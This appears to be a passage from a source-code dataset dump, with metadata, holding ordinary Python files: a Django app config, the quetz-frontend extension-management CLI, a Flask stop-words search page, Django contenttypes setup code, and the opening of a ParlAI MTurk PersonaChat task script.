"MIT"
] | null | null | null |
from django.apps import AppConfig
class MasterAppConfig(AppConfig):
    """Django app configuration for the msa.contrib.master service."""
    name = 'msa.contrib.master'
    verbose_name = 'Master Service'
| 19.714286
| 35
| 0.746377
|
from django.apps import AppConfig
class MasterAppConfig(AppConfig):
    """Django app configuration for the msa.contrib.master service."""
    name = 'msa.contrib.master'
    verbose_name = 'Master Service'
| true
| true
|
f70531491a4fe1bfff0ca5ec957d7f9cd2f74762
| 8,381
|
py
|
Python
|
quetz_frontend/cli.py
|
hbcarlos/quetz-frontend
|
86a41de3a3e05c4c324bf2c5f2d4dda76a4fa3ce
|
[
"BSD-3-Clause"
] | null | null | null |
quetz_frontend/cli.py
|
hbcarlos/quetz-frontend
|
86a41de3a3e05c4c324bf2c5f2d4dda76a4fa3ce
|
[
"BSD-3-Clause"
] | null | null | null |
quetz_frontend/cli.py
|
hbcarlos/quetz-frontend
|
86a41de3a3e05c4c324bf2c5f2d4dda76a4fa3ce
|
[
"BSD-3-Clause"
] | null | null | null |
import importlib
import json
import os
import shutil
import subprocess
from pathlib import Path
from shutil import which
from typing import List, Optional, Tuple
from setuptools import find_packages
from typer import Argument, Option, Typer
from .paths import (
GLOBAL_APP_DIR,
GLOBAL_EXTENSIONS_DIR,
GLOBAL_FRONTEND_DIR,
GLOBAL_QUETZ_DIR,
LOCAL_APP_DIR,
)
from .utils import clean_dir, get_extensions_dir, get_federated_extensions
app = Typer()
@app.command()
def link_frontend(
    dev_mode: bool = Option(
        False, "--development", help="Whether to install it in dev mode or not"
    )
) -> None:
    """Install the Quetz-Frontend"""
    # BUG FIX: `assert` is stripped under `python -O`; validate explicitly.
    if not LOCAL_APP_DIR.exists():
        raise FileNotFoundError(f"Quetz-Frontend app directory not found: {LOCAL_APP_DIR}")
    if not GLOBAL_FRONTEND_DIR.exists():
        GLOBAL_FRONTEND_DIR.mkdir(parents=True, exist_ok=True)
    # Remove any previous installation, whether symlink or real directory.
    if GLOBAL_APP_DIR.exists():
        if GLOBAL_APP_DIR.is_symlink():
            GLOBAL_APP_DIR.unlink()
        else:
            shutil.rmtree(GLOBAL_APP_DIR)
    if dev_mode:
        # Dev mode: symlink so local edits are picked up without reinstalling.
        GLOBAL_APP_DIR.symlink_to(LOCAL_APP_DIR)
        print(
            f"""Symlink created:
            Ori: {LOCAL_APP_DIR}
            Dest: {GLOBAL_APP_DIR}
            """
        )
    else:
        shutil.copytree(LOCAL_APP_DIR, GLOBAL_APP_DIR, symlinks=True)
        print(
            f"""App directory copied:
            Ori: {LOCAL_APP_DIR}
            Dest: {GLOBAL_APP_DIR}
            """
        )
@app.command()
def clean_frontend() -> None:
"""Clean the Quetz-Frontend"""
if GLOBAL_APP_DIR.is_file() or GLOBAL_APP_DIR.is_symlink():
GLOBAL_APP_DIR.unlink()
elif GLOBAL_APP_DIR.is_dir():
shutil.rmtree(GLOBAL_APP_DIR)
@app.command()
def install(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Build and install an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(ext_path, True, False)
module, metadata = _get_extensions_metadata(extension_path)
src = Path(extension_path).joinpath(module.__name__, metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(metadata[0]["dest"])
clean_dir(dest)
shutil.copytree(src, dest, symlinks=True)
print(
f"""
Extension installed:
Path: {dest}
"""
)
@app.command()
def develop(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Build and install an extension in dev mode"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, True, False)
_develop_extension(extension_path)
@app.command()
def build(
ext_path: str = Argument(Path(), help="The path of the extension"),
dev_mode: bool = Option(False, "--development", help="Build in development"),
) -> None:
"""Build an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, dev_mode, False)
@app.command()
def watch(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Watch an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_develop_extension(extension_path)
_build_extension(extension_path, True, True)
@app.command()
def uninstall(ext_name: str = Argument("", help="The name of the extension")) -> None:
"""Uninstall an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(GLOBAL_EXTENSIONS_DIR, ext_name)
clean_dir(extension_path)
@app.command()
def list() -> None:
"""List of extensions"""
print(f"Installed extensions:")
print(f"---------------------")
print(f" Installation path: '{GLOBAL_EXTENSIONS_DIR}'\n")
extensions = get_federated_extensions([get_extensions_dir()])
if not extensions:
print("No installed extensions yet")
for ext in extensions.values():
print(f'\t- {Path(ext["ext_path"]).relative_to(GLOBAL_EXTENSIONS_DIR)}')
print()
@app.command()
def clean() -> None:
"""Clean the extensions directory"""
if GLOBAL_EXTENSIONS_DIR.exists():
shutil.rmtree(GLOBAL_EXTENSIONS_DIR)
@app.command()
def paths() -> None:
"""Quetz installation paths"""
print(
f"""
System cofigured paths:
Quetz: {GLOBAL_QUETZ_DIR}
Frontend: {GLOBAL_FRONTEND_DIR}
App: {GLOBAL_APP_DIR}
Extensions: {GLOBAL_EXTENSIONS_DIR}
"""
)
def _develop_extension(ext_path: Path):
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
_, metadata = _get_extensions_metadata(ext_path)
src = ext_path / ext_data["quetz"].get("outputDir", metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(ext_data["name"])
clean_dir(dest)
# Create parent directory if extension name is scoped
dest.parent.mkdir(parents=True, exist_ok=True)
dest.symlink_to(src)
print(
f"""
Symlink created:
Ori: {src!s}
Dest: {dest!s}
"""
)
def _build_extension(ext_path: Path, dev_mode: bool = False, watch: bool = False):
if not GLOBAL_APP_DIR.joinpath("package.json").exists():
print(f"Quetz frontend not fount at '{GLOBAL_APP_DIR!s}'")
builder_path = _find_builder(ext_path)
if builder_path is None:
print(f"Could not find @quetz-frontend/builder at {ext_path!s}")
print(f"Extensions require a devDependency '@quetz-frontend/builder'")
return
exe = "node"
exe_path = which(exe)
if not exe_path:
print(f"Could not find {exe}. Install NodeJS.")
exit(1)
command = [exe, str(builder_path), "--core-path", str(GLOBAL_APP_DIR.resolve())]
if dev_mode:
command.append("--development")
command.append("--source-map")
if watch:
command.append("--watch")
command.append(str(ext_path))
print("Building extension")
subprocess.check_call(command)
def _find_builder(ext_path: Path) -> Optional[Path]:
"""Find the package '@quetz-frontend/builder' in the extension dependencies"""
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
depVersion2 = ext_data.get("devDependencies", dict()).get("@quetz-frontend/builder")
depVersion2 = depVersion2 or ext_data.get("dependencies", dict()).get(
"@quetz-frontend/builder"
)
if depVersion2 is None:
return None
# Find @quetz-frontend/builder in the node_modules directory
target = ext_path
while not (target / "node_modules" / "@quetz-frontend" / "builder").exists():
if target.parent == target:
return None
target = target.parent
return (
target
/ "node_modules"
/ "@quetz-frontend"
/ "builder"
/ "lib"
/ "build-quetzextension.js"
)
def _get_extensions_metadata(
module_path: Path,
) -> Tuple["importlib.ModuleType", List[str]]:
mod_path = module_path.resolve()
if not mod_path.exists():
raise FileNotFoundError(f"The path `{mod_path!s}` does not exist.")
# TODO: Change function name to match lab
try:
module = importlib.import_module(str(module_path))
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
else:
module = None
except Exception:
module = None
# Looking for modules in the package
packages = find_packages(str(mod_path))
for package in packages:
try:
module = importlib.import_module(package)
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
except Exception:
module = None
raise ModuleNotFoundError(f"There is not a extension at {module_path}")
if __name__ == "__main__":
app()
| 26.862179
| 88
| 0.65386
|
import importlib
import json
import os
import shutil
import subprocess
from pathlib import Path
from shutil import which
from typing import List, Optional, Tuple
from setuptools import find_packages
from typer import Argument, Option, Typer
from .paths import (
GLOBAL_APP_DIR,
GLOBAL_EXTENSIONS_DIR,
GLOBAL_FRONTEND_DIR,
GLOBAL_QUETZ_DIR,
LOCAL_APP_DIR,
)
from .utils import clean_dir, get_extensions_dir, get_federated_extensions
app = Typer()
@app.command()
def link_frontend(
dev_mode: bool = Option(
False, "--development", help="Whether to install it in dev mode or not"
)
) -> None:
assert LOCAL_APP_DIR.exists()
if not GLOBAL_FRONTEND_DIR.exists():
GLOBAL_FRONTEND_DIR.mkdir(parents=True, exist_ok=True)
if GLOBAL_APP_DIR.exists():
if GLOBAL_APP_DIR.is_symlink():
GLOBAL_APP_DIR.unlink()
else:
shutil.rmtree(GLOBAL_APP_DIR)
if dev_mode:
GLOBAL_APP_DIR.symlink_to(LOCAL_APP_DIR)
print(
f"""Symlink created:
Ori: {LOCAL_APP_DIR}
Dest: {GLOBAL_APP_DIR}
"""
)
else:
shutil.copytree(LOCAL_APP_DIR, GLOBAL_APP_DIR, symlinks=True)
print(
f"""App directory copied:
Ori: {LOCAL_APP_DIR}
Dest: {GLOBAL_APP_DIR}
"""
)
@app.command()
def clean_frontend() -> None:
if GLOBAL_APP_DIR.is_file() or GLOBAL_APP_DIR.is_symlink():
GLOBAL_APP_DIR.unlink()
elif GLOBAL_APP_DIR.is_dir():
shutil.rmtree(GLOBAL_APP_DIR)
@app.command()
def install(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(ext_path, True, False)
module, metadata = _get_extensions_metadata(extension_path)
src = Path(extension_path).joinpath(module.__name__, metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(metadata[0]["dest"])
clean_dir(dest)
shutil.copytree(src, dest, symlinks=True)
print(
f"""
Extension installed:
Path: {dest}
"""
)
@app.command()
def develop(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, True, False)
_develop_extension(extension_path)
@app.command()
def build(
ext_path: str = Argument(Path(), help="The path of the extension"),
dev_mode: bool = Option(False, "--development", help="Build in development"),
) -> None:
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, dev_mode, False)
@app.command()
def watch(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_develop_extension(extension_path)
_build_extension(extension_path, True, True)
@app.command()
def uninstall(ext_name: str = Argument("", help="The name of the extension")) -> None:
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(GLOBAL_EXTENSIONS_DIR, ext_name)
clean_dir(extension_path)
@app.command()
def list() -> None:
print(f"Installed extensions:")
print(f"---------------------")
print(f" Installation path: '{GLOBAL_EXTENSIONS_DIR}'\n")
extensions = get_federated_extensions([get_extensions_dir()])
if not extensions:
print("No installed extensions yet")
for ext in extensions.values():
print(f'\t- {Path(ext["ext_path"]).relative_to(GLOBAL_EXTENSIONS_DIR)}')
print()
@app.command()
def clean() -> None:
if GLOBAL_EXTENSIONS_DIR.exists():
shutil.rmtree(GLOBAL_EXTENSIONS_DIR)
@app.command()
def paths() -> None:
print(
f"""
System cofigured paths:
Quetz: {GLOBAL_QUETZ_DIR}
Frontend: {GLOBAL_FRONTEND_DIR}
App: {GLOBAL_APP_DIR}
Extensions: {GLOBAL_EXTENSIONS_DIR}
"""
)
def _develop_extension(ext_path: Path):
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
_, metadata = _get_extensions_metadata(ext_path)
src = ext_path / ext_data["quetz"].get("outputDir", metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(ext_data["name"])
clean_dir(dest)
dest.parent.mkdir(parents=True, exist_ok=True)
dest.symlink_to(src)
print(
f"""
Symlink created:
Ori: {src!s}
Dest: {dest!s}
"""
)
def _build_extension(ext_path: Path, dev_mode: bool = False, watch: bool = False):
if not GLOBAL_APP_DIR.joinpath("package.json").exists():
print(f"Quetz frontend not fount at '{GLOBAL_APP_DIR!s}'")
builder_path = _find_builder(ext_path)
if builder_path is None:
print(f"Could not find @quetz-frontend/builder at {ext_path!s}")
print(f"Extensions require a devDependency '@quetz-frontend/builder'")
return
exe = "node"
exe_path = which(exe)
if not exe_path:
print(f"Could not find {exe}. Install NodeJS.")
exit(1)
command = [exe, str(builder_path), "--core-path", str(GLOBAL_APP_DIR.resolve())]
if dev_mode:
command.append("--development")
command.append("--source-map")
if watch:
command.append("--watch")
command.append(str(ext_path))
print("Building extension")
subprocess.check_call(command)
def _find_builder(ext_path: Path) -> Optional[Path]:
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
depVersion2 = ext_data.get("devDependencies", dict()).get("@quetz-frontend/builder")
depVersion2 = depVersion2 or ext_data.get("dependencies", dict()).get(
"@quetz-frontend/builder"
)
if depVersion2 is None:
return None
target = ext_path
while not (target / "node_modules" / "@quetz-frontend" / "builder").exists():
if target.parent == target:
return None
target = target.parent
return (
target
/ "node_modules"
/ "@quetz-frontend"
/ "builder"
/ "lib"
/ "build-quetzextension.js"
)
def _get_extensions_metadata(
module_path: Path,
) -> Tuple["importlib.ModuleType", List[str]]:
mod_path = module_path.resolve()
if not mod_path.exists():
raise FileNotFoundError(f"The path `{mod_path!s}` does not exist.")
try:
module = importlib.import_module(str(module_path))
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
else:
module = None
except Exception:
module = None
packages = find_packages(str(mod_path))
for package in packages:
try:
module = importlib.import_module(package)
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
except Exception:
module = None
raise ModuleNotFoundError(f"There is not a extension at {module_path}")
if __name__ == "__main__":
app()
| true
| true
|
f70531e2ad32c627bf6d2ee9773984e911b06c5b
| 192
|
py
|
Python
|
socorepo/locators/__init__.py
|
LoadingByte/socorepo
|
c0880d3ad55c9d8f8aab53f5cc16600661c10c2b
|
[
"MIT"
] | null | null | null |
socorepo/locators/__init__.py
|
LoadingByte/socorepo
|
c0880d3ad55c9d8f8aab53f5cc16600661c10c2b
|
[
"MIT"
] | null | null | null |
socorepo/locators/__init__.py
|
LoadingByte/socorepo
|
c0880d3ad55c9d8f8aab53f5cc16600661c10c2b
|
[
"MIT"
] | null | null | null |
from socorepo.locators import github_tags, nexus3, pypi
LOCATOR_PARSERS = {
"github_tags": github_tags.parse_locator,
"nexus3": nexus3.parse_locator,
"pypi": pypi.parse_locator
}
| 24
| 55
| 0.744792
|
from socorepo.locators import github_tags, nexus3, pypi
LOCATOR_PARSERS = {
"github_tags": github_tags.parse_locator,
"nexus3": nexus3.parse_locator,
"pypi": pypi.parse_locator
}
| true
| true
|
f705329421c3a54d538ba279a1d4c9007a13943a
| 3,953
|
py
|
Python
|
stopWords.py
|
AninditaBasu/mattermost-hackathon-stopWords
|
11781ee3f89bf66ebd9c2b11162a588a98b237b6
|
[
"MIT"
] | 2
|
2019-11-25T19:22:24.000Z
|
2020-07-07T04:54:50.000Z
|
stopWords.py
|
AninditaBasu/mattermost-hackathon-stopWords
|
11781ee3f89bf66ebd9c2b11162a588a98b237b6
|
[
"MIT"
] | null | null | null |
stopWords.py
|
AninditaBasu/mattermost-hackathon-stopWords
|
11781ee3f89bf66ebd9c2b11162a588a98b237b6
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template, request
import json
import requests
app = Flask(__name__)
@app.route('/')
def stop_words():
URL_prefix = 'https://api.github.com/search/code?q='
URL_suffix = '+repo:spotify/mkdocs-monorepo-plugin/docs'
reportfile = open('./templates/stopWordsSearch.html', 'w')
reportfile.write('<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/bootstrap.min.css">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/common.css">')
reportfile.write('<script src="../static/jquery.min.js"></script>')
reportfile.write('<script src="../static/popper.min.js"></script>')
reportfile.write('<script src="../static/bootstrap.min.js"></script>')
reportfile.write('<title>Stop-words Search</title></head>')
reportfile.write('<body><div class="container"><h1>Stop-words Search</h1>')
fname = './static/wordList.txt'
wordlist = []
explainlist = []
print("\n")
print('Reading the word list ...\n')
fwordlist = open(fname, 'r')
for line in fwordlist:
colon = line.find(':')
word = line[0:(colon)]
explain = line[(colon + 1):]
explain = explain.rstrip()
print(word)
print(explain)
wordlist.append(word)
explainlist.append(explain)
fwordlist.close()
print(wordlist)
print(explainlist)
x = len(wordlist)
print('\nNo. of words and phrases to search for: ', x)
try:
reportfile.write('<p class="lead">Consider reviewing the occurrences of the following words in the documentation.</p><hr/>')
wordpos = 0
for word in wordlist:
url_string = URL_prefix + word + URL_suffix
r = requests.get(url_string)
json_data = json.loads(json.dumps(r.json()))
print(json_data)
if len(json_data['items']) != 0:
print(word)
reportfile.write('<div class="container">')
reportfile.write('<h2>' + word + '</h2>')
print(explainlist[wordpos])
reportfile.write('<p>' + explainlist[wordpos] + '</p>')
print(json_data['total_count'], 'instances of', word)
reportfile.write('<p>' + str(json_data['total_count']) + ' instances of <mark>' + word + '</mark> found in the following files:</p>')
reportfile.write('<ul>')
for line in json_data['items']:
for k, v in line.items():
if k == 'path':
print(v)
reportfile.write('<li>' + v + '</li>')
print('--------\n')
reportfile.write('</ul>')
reportfile.write('</div>')
reportfile.write('<hr/>')
wordpos = wordpos + 1
except:
reportfile.write("<p class='text-danger'>>>>>> If you're seeing these lines, it means you've hit the API rate limits for GitHub search and the Stopwords search was abandoned.</p>")
#reportfile.write("<p class='text-danger'>Had the search been completed, you would've got an output shown in the following image.</p>")
#reportfile.write('<img src="../static/stopWords.png"/>')
reportfile.write("<p class='text-danger'>Maybe choose a smaller documentation repository for your search?</p>")
reportfile.write("<p class='text-danger'>But then, this is just a demo and you get the general idea, I hope? <<<<<")
reportfile.write("</div></body>")
reportfile.write("</html>")
reportfile.close()
return render_template('stopWordsSearch.html')
if __name__ == "__main__":
port = int(os.environ.get("PORT", 5000))
app.run(host='0.0.0.0', port=port)
#app.run()
| 47.059524
| 203
| 0.589679
|
from flask import Flask, render_template, request
import json
import requests
app = Flask(__name__)
@app.route('/')
def stop_words():
URL_prefix = 'https://api.github.com/search/code?q='
URL_suffix = '+repo:spotify/mkdocs-monorepo-plugin/docs'
reportfile = open('./templates/stopWordsSearch.html', 'w')
reportfile.write('<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/bootstrap.min.css">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/common.css">')
reportfile.write('<script src="../static/jquery.min.js"></script>')
reportfile.write('<script src="../static/popper.min.js"></script>')
reportfile.write('<script src="../static/bootstrap.min.js"></script>')
reportfile.write('<title>Stop-words Search</title></head>')
reportfile.write('<body><div class="container"><h1>Stop-words Search</h1>')
fname = './static/wordList.txt'
wordlist = []
explainlist = []
print("\n")
print('Reading the word list ...\n')
fwordlist = open(fname, 'r')
for line in fwordlist:
colon = line.find(':')
word = line[0:(colon)]
explain = line[(colon + 1):]
explain = explain.rstrip()
print(word)
print(explain)
wordlist.append(word)
explainlist.append(explain)
fwordlist.close()
print(wordlist)
print(explainlist)
x = len(wordlist)
print('\nNo. of words and phrases to search for: ', x)
try:
reportfile.write('<p class="lead">Consider reviewing the occurrences of the following words in the documentation.</p><hr/>')
wordpos = 0
for word in wordlist:
url_string = URL_prefix + word + URL_suffix
r = requests.get(url_string)
json_data = json.loads(json.dumps(r.json()))
print(json_data)
if len(json_data['items']) != 0:
print(word)
reportfile.write('<div class="container">')
reportfile.write('<h2>' + word + '</h2>')
print(explainlist[wordpos])
reportfile.write('<p>' + explainlist[wordpos] + '</p>')
print(json_data['total_count'], 'instances of', word)
reportfile.write('<p>' + str(json_data['total_count']) + ' instances of <mark>' + word + '</mark> found in the following files:</p>')
reportfile.write('<ul>')
for line in json_data['items']:
for k, v in line.items():
if k == 'path':
print(v)
reportfile.write('<li>' + v + '</li>')
print('--------\n')
reportfile.write('</ul>')
reportfile.write('</div>')
reportfile.write('<hr/>')
wordpos = wordpos + 1
except:
reportfile.write("<p class='text-danger'>>>>>> If you're seeing these lines, it means you've hit the API rate limits for GitHub search and the Stopwords search was abandoned.</p>")
#reportfile.write('<img src="../static/stopWords.png"/>')
reportfile.write("<p class='text-danger'>Maybe choose a smaller documentation repository for your search?</p>")
reportfile.write("<p class='text-danger'>But then, this is just a demo and you get the general idea, I hope? <<<<<")
reportfile.write("</div></body>")
reportfile.write("</html>")
reportfile.close()
return render_template('stopWordsSearch.html')
if __name__ == "__main__":
port = int(os.environ.get("PORT", 5000))
app.run(host='0.0.0.0', port=port)
#app.run()
| true
| true
|
f705330137e0d77aaa9e47ecb94b760f7a854733
| 2,916
|
py
|
Python
|
django/contrib/contenttypes/management.py
|
KingWapo/django
|
115c307184d441fbc27a8f43a99af5d992cfcc13
|
[
"BSD-3-Clause"
] | 2
|
2015-01-21T15:45:07.000Z
|
2015-02-21T02:38:13.000Z
|
env/lib/python2.7/site-packages/django/contrib/contenttypes/management.py
|
luiscarlosgph/nas
|
e5acee61e8bbf12c34785fe971ce7df8dee775d4
|
[
"MIT"
] | 10
|
2019-12-26T17:31:31.000Z
|
2022-03-21T22:17:33.000Z
|
env/lib/python2.7/site-packages/django/contrib/contenttypes/management.py
|
luiscarlosgph/nas
|
e5acee61e8bbf12c34785fe971ce7df8dee775d4
|
[
"MIT"
] | 1
|
2021-03-06T14:22:00.000Z
|
2021-03-06T14:22:00.000Z
|
from django.apps import apps
from django.db import DEFAULT_DB_ALIAS, router
from django.db.models import signals
from django.utils.encoding import smart_text
from django.utils import six
from django.utils.six.moves import input
def update_contenttypes(app_config, verbosity=2, interactive=True, using=DEFAULT_DB_ALIAS, **kwargs):
"""
Creates content types for models in the given app, removing any model
entries that no longer have a matching model class.
"""
if not app_config.models_module:
return
try:
ContentType = apps.get_model('contenttypes', 'ContentType')
except LookupError:
return
if not router.allow_migrate(using, ContentType):
return
ContentType.objects.clear_cache()
app_label = app_config.label
app_models = dict(
(model._meta.model_name, model)
for model in app_config.get_models())
if not app_models:
return
# Get all the content types
content_types = dict(
(ct.model, ct)
for ct in ContentType.objects.using(using).filter(app_label=app_label)
)
to_remove = [
ct
for (model_name, ct) in six.iteritems(content_types)
if model_name not in app_models
]
cts = [
ContentType(
name=smart_text(model._meta.verbose_name_raw),
app_label=app_label,
model=model_name,
)
for (model_name, model) in six.iteritems(app_models)
if model_name not in content_types
]
ContentType.objects.using(using).bulk_create(cts)
if verbosity >= 2:
for ct in cts:
print("Adding content type '%s | %s'" % (ct.app_label, ct.model))
# Confirm that the content type is stale before deletion.
if to_remove:
if interactive:
content_type_display = '\n'.join(
' %s | %s' % (ct.app_label, ct.model)
for ct in to_remove
)
ok_to_delete = input("""The following content types are stale and need to be deleted:
%s
Any objects related to these content types by a foreign key will also
be deleted. Are you sure you want to delete these content types?
If you're unsure, answer 'no'.
Type 'yes' to continue, or 'no' to cancel: """ % content_type_display)
else:
ok_to_delete = False
if ok_to_delete == 'yes':
for ct in to_remove:
if verbosity >= 2:
print("Deleting stale content type '%s | %s'" % (ct.app_label, ct.model))
ct.delete()
else:
if verbosity >= 2:
print("Stale content types remain.")
def update_all_contenttypes(**kwargs):
for app_config in apps.get_app_configs():
update_contenttypes(app_config, **kwargs)
signals.post_migrate.connect(update_contenttypes)
if __name__ == "__main__":
update_all_contenttypes()
| 29.16
| 101
| 0.63546
|
from django.apps import apps
from django.db import DEFAULT_DB_ALIAS, router
from django.db.models import signals
from django.utils.encoding import smart_text
from django.utils import six
from django.utils.six.moves import input
def update_contenttypes(app_config, verbosity=2, interactive=True, using=DEFAULT_DB_ALIAS, **kwargs):
if not app_config.models_module:
return
try:
ContentType = apps.get_model('contenttypes', 'ContentType')
except LookupError:
return
if not router.allow_migrate(using, ContentType):
return
ContentType.objects.clear_cache()
app_label = app_config.label
app_models = dict(
(model._meta.model_name, model)
for model in app_config.get_models())
if not app_models:
return
content_types = dict(
(ct.model, ct)
for ct in ContentType.objects.using(using).filter(app_label=app_label)
)
to_remove = [
ct
for (model_name, ct) in six.iteritems(content_types)
if model_name not in app_models
]
cts = [
ContentType(
name=smart_text(model._meta.verbose_name_raw),
app_label=app_label,
model=model_name,
)
for (model_name, model) in six.iteritems(app_models)
if model_name not in content_types
]
ContentType.objects.using(using).bulk_create(cts)
if verbosity >= 2:
for ct in cts:
print("Adding content type '%s | %s'" % (ct.app_label, ct.model))
if to_remove:
if interactive:
content_type_display = '\n'.join(
' %s | %s' % (ct.app_label, ct.model)
for ct in to_remove
)
ok_to_delete = input("""The following content types are stale and need to be deleted:
%s
Any objects related to these content types by a foreign key will also
be deleted. Are you sure you want to delete these content types?
If you're unsure, answer 'no'.
Type 'yes' to continue, or 'no' to cancel: """ % content_type_display)
else:
ok_to_delete = False
if ok_to_delete == 'yes':
for ct in to_remove:
if verbosity >= 2:
print("Deleting stale content type '%s | %s'" % (ct.app_label, ct.model))
ct.delete()
else:
if verbosity >= 2:
print("Stale content types remain.")
def update_all_contenttypes(**kwargs):
for app_config in apps.get_app_configs():
update_contenttypes(app_config, **kwargs)
signals.post_migrate.connect(update_contenttypes)
if __name__ == "__main__":
update_all_contenttypes()
| true
| true
|
f705330f398c68077399fd500653c9cafa921704
| 4,870
|
py
|
Python
|
parlai/mturk/tasks/personachat/personachat_chat/run.py
|
khaimaitien/Mai_convai2
|
83bf99ba09d678455aad49239f3daefc5a7b8fc9
|
[
"BSD-3-Clause"
] | 1
|
2018-09-28T05:47:45.000Z
|
2018-09-28T05:47:45.000Z
|
parlai/mturk/tasks/personachat/personachat_chat/run.py
|
crazyrex/ParlAI
|
fbfda4f4aadd357dfdb7b4baf230c45c039a1338
|
[
"BSD-3-Clause"
] | 1
|
2018-09-27T17:11:24.000Z
|
2018-09-27T17:11:24.000Z
|
parlai/mturk/tasks/personachat/personachat_chat/run.py
|
khaimaitien/Mai_convai2
|
83bf99ba09d678455aad49239f3daefc5a7b8fc9
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from parlai.core.params import ParlaiParser
from parlai.mturk.core.mturk_manager import MTurkManager
from worlds import \
PersonaChatWorld, PersonaProfileWorld, PersonasGenerator
from task_config import task_config
import os
def main():
"""This task consists of one agent, model or MTurk worker, talking to an
MTurk worker to negotiate a deal.
"""
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
argparser.add_argument('-min_t', '--min_turns', default=5, type=int,
help='minimum number of turns')
argparser.add_argument('-mt', '--max_turns', default=10, type=int,
help='maximal number of chat turns')
argparser.add_argument('-mx_rsp_time', '--max_resp_time', default=150,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('-mx_psn_time', '--max_persona_time', type=int,
default=300, help='time limit for turker'
'entering the persona')
argparser.add_argument('--ag_shutdown_time', default=120,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('--persona-type', default='both', type=str,
choices=['both', 'self', 'other'],
help='Which personas to load from personachat')
argparser.add_argument('--revised', default=False, type='bool',
help='Whether to use revised personas')
argparser.add_argument('-rt', '--range_turn', default='5,7',
help='sample range of number of turns')
argparser.add_argument('--personas-path', default=None,
help='specify path for personas data')
opt = argparser.parse_args()
directory_path = os.path.dirname(os.path.abspath(__file__))
opt['task'] = os.path.basename(directory_path)
if not opt.get('personas_path'):
opt['personas_path'] = argparser.parlai_home + '/parlai/mturk/personachat_chat/data'
opt.update(task_config)
opt['extract_personas_path'] = os.path.join(opt['datapath'], 'personachat_chat')
mturk_agent_ids = ['PERSON_1', 'PERSON_2']
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=mturk_agent_ids
)
persona_generator = PersonasGenerator(opt)
mturk_manager.setup_server(task_directory_path=directory_path)
try:
mturk_manager.start_new_run()
mturk_manager.create_hits()
if not opt['is_sandbox']:
blocked_worker_list = []
for w in blocked_worker_list:
mturk_manager.block_worker(w, 'We found that you have unexpected behaviors in our previous HITs. For more questions please email us.')
def run_onboard(worker):
worker.persona_generator = persona_generator
world = PersonaProfileWorld(opt, worker)
world.parley()
world.shutdown()
mturk_manager.set_onboard_function(onboard_function=run_onboard)
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
for index, worker in enumerate(workers):
